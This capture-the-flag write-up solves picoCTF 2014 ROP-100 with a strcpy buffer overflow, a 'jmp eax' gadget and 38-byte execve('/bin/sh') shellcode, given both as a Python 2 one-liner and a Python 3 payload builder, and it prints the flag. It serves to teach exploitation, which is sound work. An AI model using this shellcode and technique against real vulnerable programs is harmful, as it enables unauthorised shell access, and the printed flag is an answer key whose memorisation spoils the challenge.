
picoCTF 2014 ROP-100 Write-up

  • Jayakrishna Menon V
  • Aug 13, 2015
  • 1 min read

This binary is running on a machine with ASLR! Can you bypass it? The binary can be found at /home/rop1/ on the shell server. The source can be found here.

This challenge runs with /proc/sys/kernel/randomize_va_space set to 1, which randomizes the base of the stack and of mmap'd regions (shared libraries included) on every run, so an exploit cannot hard-code a stack or library address; level 2 would additionally randomize the heap. That makes exploitation harder, but this is an easy one compared to the other ASLR questions: the executable itself is loaded at a fixed address, so its own code is usable as-is, and we never need to guess where the stack is.

Looking at the source code, we can see that the input is copied with strcpy(). That is the key: strcpy() returns a pointer to the destination, so when it returns, eax holds the address of the stack buffer our input was copied into. If the vulnerable function does nothing else with eax before it returns, that register still points at our data at the moment the overwritten return address is used, so the stack address never has to be guessed despite ASLR.

Inspecting the binary, we can see that it has an executable stack (the GNU_STACK program header in readelf -l output is marked RWE), so shellcode placed in the buffer can run in place.

So all we need is a gadget that jumps to eax; the shellcode itself arrives in the command-line argument.

For finding gadgets, I use rp++ which I find easy to use. You can also try ropeme or any other tools like that.

I found a 'jmp eax ; ret' gadget, which serves my need (only the jmp matters; the ret after it is never reached).

With a little bit of math we can see that 76 bytes must be written before the saved eip is overwritten. The shellcode I use is 38 bytes, so the remaining 38 bytes are filled with junk. "A" (0x41) is the right choice of junk rather than an arbitrary value: eax points to the start of the buffer, not to the shellcode, so execution begins in the padding, and 0x41 decodes as inc ecx on x86, a harmless instruction that makes the padding act as a NOP sled into the shellcode.

Now use Python for the final touches (the print statement below is Python 2):

python -c 'print "A"*38+"\xeb\x18\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xb0\x0b\xcd\x80\xe8\xe3\xff\xff\xff/bin/sh"+"\x54\x0b\x05\x08"'

The last 4 bytes are the little-endian address of the jmp eax gadget (0x08050b54). Note that neither the address nor the shellcode contains a NUL byte, which strcpy() would stop at. Pass the result as the command-line argument to the binary and the spawned shell can read flag.txt.
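The same payload, built and sanity-checked in Python 3 rather than typed as a one-liner. This is an added example, not the post's own code: the 76-byte distance to the saved eip, the gadget address 0x08050b54 and the 38-byte shellcode are taken from the write-up, the script name is my own, and the .text bytes used to demonstrate gadget scanning are constructed here. Beyond reproducing the payload, it decodes the shellcode's two relative branches to confirm the jmp/call/pop trick is consistent, refuses any payload containing a NUL (strcpy() would truncate it), and shows what a gadget finder such as rp++ is doing when it reports jmp eax: scanning for the byte pair ff e0, aligned or not.

```python
"""
Payload builder and sanity checks for the picoCTF 2014 ROP-100 exploit
described in the write-up. Added example, not the post's own code.
Offsets, gadget address and shellcode come from the write-up; SAMPLE_TEXT
is constructed here purely to exercise the gadget scanner.
"""
import struct

OFFSET_TO_EIP = 76            # bytes from the start of the buffer to saved eip
JMP_EAX_GADGET = 0x08050B54   # address of `jmp eax` in the non-PIE binary

# Classic jmp/call/pop execve("/bin/sh") shellcode (38 bytes, no NUL bytes).
SHELLCODE = (
    b"\xeb\x18"              # jmp  short +0x18   -> the call below
    b"\x5e"                  # pop  esi           ; esi = &"/bin/sh"
    b"\x89\x76\x08"          # mov  [esi+8], esi  ; argv[0] = "/bin/sh"
    b"\x31\xc0"              # xor  eax, eax
    b"\x88\x46\x07"          # mov  [esi+7], al   ; NUL-terminate the string
    b"\x89\x46\x0c"          # mov  [esi+12], eax ; argv[1] = NULL
    b"\x89\xf3"              # mov  ebx, esi      ; filename
    b"\x8d\x4e\x08"          # lea  ecx, [esi+8]  ; argv
    b"\x8d\x56\x0c"          # lea  edx, [esi+12] ; envp = &NULL (empty env)
    b"\xb0\x0b"              # mov  al, 11        ; SYS_execve
    b"\xcd\x80"              # int  0x80
    b"\xe8\xe3\xff\xff\xff"  # call -0x1d -> pop esi; pushes &"/bin/sh"
    b"/bin/sh"
)
# The stores at [esi+7..15] land at and just above the saved-eip slot.
# That memory is dead once the vulnerable function has returned, so the
# writes are harmless, but they are why the stack must be writable too.


def check_shellcode(sc: bytes) -> dict:
    """Decode both relative branches and confirm the jmp lands on the call,
    the call returns to `pop esi`, and the pushed address is the string."""
    assert sc[0] == 0xEB, "expected a short jmp at offset 0"
    jmp_target = 2 + struct.unpack("<b", sc[1:2])[0]       # rel8 from next insn
    assert sc[jmp_target] == 0xE8, "jmp must land on the call"
    rel32 = struct.unpack("<i", sc[jmp_target + 1:jmp_target + 5])[0]
    string_offset = jmp_target + 5                         # what `call` pushes
    call_target = string_offset + rel32
    assert sc[call_target] == 0x5E, "call must return to pop esi"
    return {
        "jmp_target": jmp_target,
        "call_target": call_target,
        "string_offset": string_offset,
        "string": sc[string_offset:],
    }


def build_payload(padding: bytes = b"A") -> bytes:
    """Layout: [38 bytes padding][38 bytes shellcode][saved eip = jmp eax].
    0x41 decodes as `inc ecx`, so the padding doubles as a NOP sled: eax
    points at the start of the buffer, and execution slides into the code."""
    pad_len = OFFSET_TO_EIP - len(SHELLCODE)
    payload = padding * pad_len + SHELLCODE + struct.pack("<I", JMP_EAX_GADGET)
    # strcpy() stops at the first NUL and argv strings cannot carry one,
    # so a single 0x00 anywhere would silently truncate the payload.
    if b"\x00" in payload:
        raise ValueError("payload contains a NUL byte; strcpy would truncate it")
    return payload


def find_jmp_eax(text: bytes, base: int) -> list:
    """Return virtual addresses of every `ff e0` (jmp eax) pair in a .text
    blob loaded at `base`. Unaligned hits count: x86 can start decoding at
    any byte, which is exactly what gadget finders rely on."""
    hits, start = [], 0
    while True:
        i = text.find(b"\xff\xe0", start)
        if i == -1:
            return hits
        hits.append(base + i)
        start = i + 1


# Constructed bytes, not from the real binary: one aligned `jmp eax` after a
# prologue, and one `ff e0` hiding inside the rel32 of a `call`.
SAMPLE_TEXT = b"\x55\x89\xe5\x83\xec\x10\xff\xe0\xc3\x90\x90\xe8\xff\xe0\x00\x00"


if __name__ == "__main__":
    import sys
    info = check_shellcode(SHELLCODE)
    sys.stderr.write("shellcode ok: string %r at offset %d\n"
                     % (info["string"], info["string_offset"]))
    sys.stdout.buffer.write(build_payload())   # raw bytes, no trailing newline
```

Save it as, say, rop100.py and pass `"$(python3 rop100.py)"` as the binary's single argument; command substitution only strips trailing newlines, and the payload has none and no NUL, so it arrives intact. Before firing it, it is worth confirming in gdb that eax still equals the buffer address at the vulnerable function's ret: if the compiler reused eax after strcpy(), jmp eax lands somewhere else and a different gadget is needed.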

flag: theres_no_need_to_guess
